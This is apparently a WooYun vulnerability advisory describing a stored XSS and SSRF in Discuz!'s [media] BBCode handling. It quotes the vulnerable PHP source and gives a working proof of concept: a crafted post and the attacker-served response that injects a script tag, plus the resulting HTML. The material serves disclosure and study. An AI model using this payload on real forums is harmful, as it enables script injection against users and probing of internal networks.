当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0150674

漏洞标题: discuz!有条件存储型xss和ssrf(条件很容易达到)

相关厂商:Discuz!

漏洞作者: Jannock

提交时间:2015-10-30 17:31

修复时间:2016-02-02 17:40

公开时间:2016-02-02 17:40

漏洞类型:XSS跨站脚本攻击

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-30: 细节已通知厂商并且等待厂商处理中
2015-11-04: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航
2015-12-29: 细节向核心白帽子及相关领域专家公开
2016-01-08: 细节向普通白帽子公开
2016-01-18: 细节向实习白帽子公开
2016-02-02: 细节向公众公开

简要描述:

先提交个鸡肋的。。。其实条件很容易达到。

详细说明:

文件
source\function\function_discuzcode.php
function discuzcode 中

if(!defined('IN_MOBILE')) {
   if(strpos($msglower, '[/media]') !== FALSE) {
    $message = preg_replace("/\[media=([\w,]+)\]\s*([^\[\<\r\n]+?)\s*\[\/media\]/ies", $allowmediacode ? "parsemedia('\\1', '\\2')" : "bbcodeurl('\\2', '<a href=\"{url}\" target=\"_blank\">{url}</a>')", $message);
   }


跟踪 parsemedia

function parsemedia($params, $url) {
 $params = explode(',', $params);
 $width = intval($params[1]) > 800 ? 800 : intval($params[1]);
 $height = intval($params[2]) > 600 ? 600 : intval($params[2]);
 $url = addslashes($url);
        if(!in_array(strtolower(substr($url, 0, 6)), array('http:/', 'https:', 'ftp://', 'rtsp:/', 'mms://')) && !preg_match('/^static\//', $url) && !preg_match('/^data\//', $url)) {
  return dhtmlspecialchars($url);
 }
 if($flv = parseflv($url, $width, $height)) {
  return $flv;
 }


跟踪 parseflv

function parseflv($url, $width = 0, $height = 0) {
 $lowerurl = strtolower($url);
 $flv = $iframe = $imgurl = '';
 if($lowerurl != str_replace(array('player.youku.com/player.php/sid/','tudou.com/v/','player.ku6.com/refer/'), '', $lowerurl)) {
  $flv = $url;
 } elseif(strpos($lowerurl, 'v.youku.com/v_show/') !== FALSE) {
  $ctx = stream_context_create(array('http' => array('timeout' => 10)));
  if(preg_match("/http:\/\/v.youku.com\/v_show\/id_([^\/]+)(.html|)/i", $url, $matches)) {
   $flv = 'http://player.youku.com/player.php/sid/'.$matches[1].'/v.swf';
   $iframe = 'http://player.youku.com/embed/'.$matches[1];
   if(!$width && !$height) {
    $api = 'http://v.youku.com/player/getPlayList/VideoIDS/'.$matches[1];
    $str = stripslashes(file_get_contents($api, false, $ctx));
    if(!empty($str) && preg_match("/\"logo\":\"(.+?)\"/i", $str, $image)) {
     $url = substr($image[1], 0, strrpos($image[1], '/')+1);
     $filename = substr($image[1], strrpos($image[1], '/')+2);
     $imgurl = $url.'0'.$filename;
    }
   }
  }
 } elseif(strpos($lowerurl, 'tudou.com/programs/view/') !== FALSE) {
  if(preg_match("/http:\/\/(www.)?tudou.com\/programs\/view\/([^\/]+)/i", $url, $matches)) {
   $flv = 'http://www.tudou.com/v/'.$matches[2];
   $iframe = 'http://www.tudou.com/programs/view/html5embed.action?code='.$matches[2];
   if(!$width && !$height) {
    $str = file_get_contents($url, false, $ctx);
    if(!empty($str) && preg_match("/<span class=\"s_pic\">(.+?)<\/span>/i", $str, $image)) {
     $imgurl = trim($image[1]);
    }
   }
  }
 } elseif(strpos($lowerurl, 'v.ku6.com/show/') !== FALSE) {
  if(preg_match("/http:\/\/v.ku6.com\/show\/([^\/]+).html/i", $url, $matches)) {
   $flv = 'http://player.ku6.com/refer/'.$matches[1].'/v.swf';
   if(!$width && !$height) {
    $api = 'http://vo.ku6.com/fetchVideo4Player/1/'.$matches[1].'.html';
    $str = file_get_contents($api, false, $ctx);
    if(!empty($str) && preg_match("/\"picpath\":\"(.+?)\"/i", $str, $image)) {
     $imgurl = str_replace(array('\u003a', '\u002e'), array(':', '.'), $image[1]);
    }
   }
  }
 } elseif(strpos($lowerurl, 'v.ku6.com/special/show_') !== FALSE) {
  if(preg_match("/http:\/\/v.ku6.com\/special\/show_\d+\/([^\/]+).html/i", $url, $matches)) {
   $flv = 'http://player.ku6.com/refer/'.$matches[1].'/v.swf';
   if(!$width && !$height) {
    $api = 'http://vo.ku6.com/fetchVideo4Player/1/'.$matches[1].'.html';
    $str = file_get_contents($api, false, $ctx);
    if(!empty($str) && preg_match("/\"picpath\":\"(.+?)\"/i", $str, $image)) {
     $imgurl = str_replace(array('\u003a', '\u002e'), array(':', '.'), $image[1]);
    }
   }
  }
 } elseif(strpos($lowerurl, 'www.youtube.com/watch?') !== FALSE) {
  if(preg_match("/http:\/\/www.youtube.com\/watch\?v=([^\/&]+)&?/i", $url, $matches)) {
   $flv = 'http://www.youtube.com/v/'.$matches[1].'&hl=zh_CN&fs=1';
   $iframe = 'http://www.youtube.com/embed/'.$matches[1];
   if(!$width && !$height) {
    $str = file_get_contents($url, false, $ctx);
    if(!empty($str) && preg_match("/'VIDEO_HQ_THUMB':\s'(.+?)'/i", $str, $image)) {
     $url = substr($image[1], 0, strrpos($image[1], '/')+1);
     $filename = substr($image[1], strrpos($image[1], '/')+3);
     $imgurl = $url.$filename;
    }
   }
  }
 } elseif(strpos($lowerurl, 'tv.mofile.com/') !== FALSE) {
  if(preg_match("/http:\/\/tv.mofile.com\/([^\/]+)/i", $url, $matches)) {
   $flv = 'http://tv.mofile.com/cn/xplayer.swf?v='.$matches[1];
   if(!$width && !$height) {
    $str = file_get_contents($url, false, $ctx);
    if(!empty($str) && preg_match("/thumbpath=\"(.+?)\";/i", $str, $image)) {
     $imgurl = trim($image[1]);
    }
   }
  }
 } elseif(strpos($lowerurl, 'v.mofile.com/show/') !== FALSE) {
  if(preg_match("/http:\/\/v.mofile.com\/show\/([^\/]+).shtml/i", $url, $matches)) {
   $flv = 'http://tv.mofile.com/cn/xplayer.swf?v='.$matches[1];
   if(!$width && !$height) {
    $str = file_get_contents($url, false, $ctx);
    if(!empty($str) && preg_match("/thumbpath=\"(.+?)\";/i", $str, $image)) {
     $imgurl = trim($image[1]);
    }
   }
  }
 } elseif(strpos($lowerurl, 'video.sina.com.cn/v/b/') !== FALSE) {
  if(preg_match("/http:\/\/video.sina.com.cn\/v\/b\/(\d+)-(\d+).html/i", $url, $matches)) {
   $flv = 'http://vhead.blog.sina.com.cn/player/outer_player.swf?vid='.$matches[1];
   if(!$width && !$height) {
    $api = 'http://interface.video.sina.com.cn/interface/common/getVideoImage.php?vid='.$matches[1];
    $str = file_get_contents($api, false, $ctx);
    if(!empty($str)) {
     $imgurl = str_replace('imgurl=', '', trim($str));
    }
   }
  }
 } elseif(strpos($lowerurl, 'you.video.sina.com.cn/b/') !== FALSE) {
  if(preg_match("/http:\/\/you.video.sina.com.cn\/b\/(\d+)-(\d+).html/i", $url, $matches)) {
   $flv = 'http://vhead.blog.sina.com.cn/player/outer_player.swf?vid='.$matches[1];
   if(!$width && !$height) {
    $api = 'http://interface.video.sina.com.cn/interface/common/getVideoImage.php?vid='.$matches[1];
    $str = file_get_contents($api, false, $ctx);
    if(!empty($str)) {
     $imgurl = str_replace('imgurl=', '', trim($str));
    }
   }
  }
 } elseif(strpos($lowerurl, 'http://my.tv.sohu.com/u/') !== FALSE) {
  if(preg_match("/http:\/\/my.tv.sohu.com\/u\/[^\/]+\/(\d+)/i", $url, $matches)) {
   $flv = 'http://v.blog.sohu.com/fo/v4/'.$matches[1];
   if(!$width && !$height) {
    $api = 'http://v.blog.sohu.com/videinfo.jhtml?m=view&id='.$matches[1].'&outType=3';
    $str = file_get_contents($api, false, $ctx);
    if(!empty($str) && preg_match("/\"cutCoverURL\":\"(.+?)\"/i", $str, $image)) {
     $imgurl = str_replace(array('\u003a', '\u002e'), array(':', '.'), $image[1]);
    }
   }
  }
 } elseif(strpos($lowerurl, 'http://v.blog.sohu.com/u/') !== FALSE) {
  if(preg_match("/http:\/\/v.blog.sohu.com\/u\/[^\/]+\/(\d+)/i", $url, $matches)) {
   $flv = 'http://v.blog.sohu.com/fo/v4/'.$matches[1];
   if(!$width && !$height) {
    $api = 'http://v.blog.sohu.com/videinfo.jhtml?m=view&id='.$matches[1].'&outType=3';
    $str = file_get_contents($api, false, $ctx);
    if(!empty($str) && preg_match("/\"cutCoverURL\":\"(.+?)\"/i", $str, $image)) {
     $imgurl = str_replace(array('\u003a', '\u002e'), array(':', '.'), $image[1]);
    }
   }
  }
 } elseif(strpos($lowerurl, 'http://www.ouou.com/fun_funview') !== FALSE) {
  $str = file_get_contents($url, false, $ctx);
  if(!empty($str) && preg_match("/var\sflv\s=\s'(.+?)';/i", $str, $matches)) {
   $flv = $_G['style']['imgdir'].'/flvplayer.swf?&autostart=true&file='.urlencode($matches[1]);
   if(!$width && !$height && preg_match("/var\simga=\s'(.+?)';/i", $str, $image)) {
    $imgurl = trim($image[1]);
   }
  }
 } elseif(strpos($lowerurl, 'http://www.56.com') !== FALSE) {
  if(preg_match("/http:\/\/www.56.com\/\S+\/play_album-aid-(\d+)_vid-(.+?).html/i", $url, $matches)) {
   $flv = 'http://player.56.com/v_'.$matches[2].'.swf';
   $matches[1] = $matches[2];
  } elseif(preg_match("/http:\/\/www.56.com\/\S+\/([^\/]+).html/i", $url, $matches)) {
   $flv = 'http://player.56.com/'.$matches[1].'.swf';
  }
  if(!$width && !$height && !empty($matches[1])) {
   $api = 'http://vxml.56.com/json/'.str_replace('v_', '', $matches[1]).'/?src=out';
   $str = file_get_contents($api, false, $ctx);
   if(!empty($str) && preg_match("/\"img\":\"(.+?)\"/i", $str, $image)) {
    $imgurl = trim($image[1]);
   }
  }
 }
 if($flv) {
  if(!$width && !$height) {
   return array('flv' => $flv, 'imgurl' => $imgurl);
  } else {
   $width = addslashes($width);
   $height = addslashes($height);
   $flv = addslashes($flv);
   $iframe = addslashes($iframe);
   $randomid = 'flv_'.random(3);
   $enablemobile = $iframe ? 'mobileplayer() ? "<iframe height=\''.$height.'\' width=\''.$width.'\' src=\''.$iframe.'\' frameborder=0 allowfullscreen></iframe>" : ' : '';
   return '<span id="'.$randomid.'"></span><script type="text/javascript" reload="1">$(\''.$randomid.'\').innerHTML=('.$enablemobile.'AC_FL_RunContent(\'width\', \''.$width.'\', \'height\', \''.$height.'\', \'allowNetworking\', \'internal\', \'allowScriptAccess\', \'never\', \'src\', \''.$flv.'\', \'quality\', \'high\', \'bgcolor\', \'#ffffff\', \'wmode\', \'transparent\', \'allowfullscreen\', \'true\'));</script>';
  }
 } else {
  return FALSE;
 }
}


可以看出多处使用 file_get_contents
url可控,从而存在ssrf
并且结果可以,返回 imgurl=
用于
source\function\function_followcode.php

function fmakeflv($flv) {
 $randomid = 'video_'.random(3);
 $flv = is_array($flv) ? $flv : array('flv' => $flv);
 if(!empty($flv['imgurl'])) {
  $html = '<table class="mtm" title="'.lang('space', 'follow_click_play').'" onclick="javascript:showFlash(\'flash\', \''.$flv['flv'].'\', this, \''.$randomid.'\');"><tr><td class="vdtn hm" style="background: url('.$flv['imgurl'].') no-repeat;    border: 1px solid #CDCDCD; cursor: pointer; height: 95px; width: 126px;"><img src="'.IMGDIR.'/vds.png" alt="'.lang('space', 'follow_click_play').'" /> </td></tr></table>';
 } else {
  $html = '<img src="'.IMGDIR.'/vd.gif" alt="'.lang('space', 'follow_click_play').'" onclick="javascript:showFlash(\'flash\', \''.$flv['flv'].'\', this, \''.$randomid.'\');" class="tn" style="cursor: pointer;" />';
 }
 return fcodedisp($html, 'video');
}


限制:
xss需要后台开启广播功能。
ssrf需要 允许使用 [audio] [media] [flash] 等多媒体代码
旧版本好像默认开启,新版默认关闭,不过后来开启的较多。

漏洞证明:

发贴(注:需工具提交,不然http://tudou.com 被转为[url]http://tudou.com )

[media=0,0]http://127.0.0.1:8080/s.php?http://tudou.com/programs/view/aaaa[/media]


http://127.0.0.1:8080/s.php
内容为:

<span class="s_pic">http://www.hao123.com/logo.gif');">aa</a><script>alert('a');</script><a a="</span>


1.png


3.png


<div class="flw_video"><ul><li><table class="mtm" title="点击播放" onclick="javascript:showFlash('flash', 'http://www.tudou.com/v/aaaa', this, 'video_vGq');"><tr><td class="vdtn hm" style="background: url(http://www.hao123.com/logo.gif');">aa</a><script>alert('a');</script><a a=") no-repeat; border: 1px solid #CDCDCD; cursor: pointer; height: 95px; width: 126px;"><img src="static/image/common/vds.png" alt="点击播放" /> </td></tr></table>


ssrf 可能shell内网
WooYun: 百度某个从SSRF到内网WebShell之2

修复方案:

过滤

版权声明:转载请注明来源 Jannock@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-02-02 17:40

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无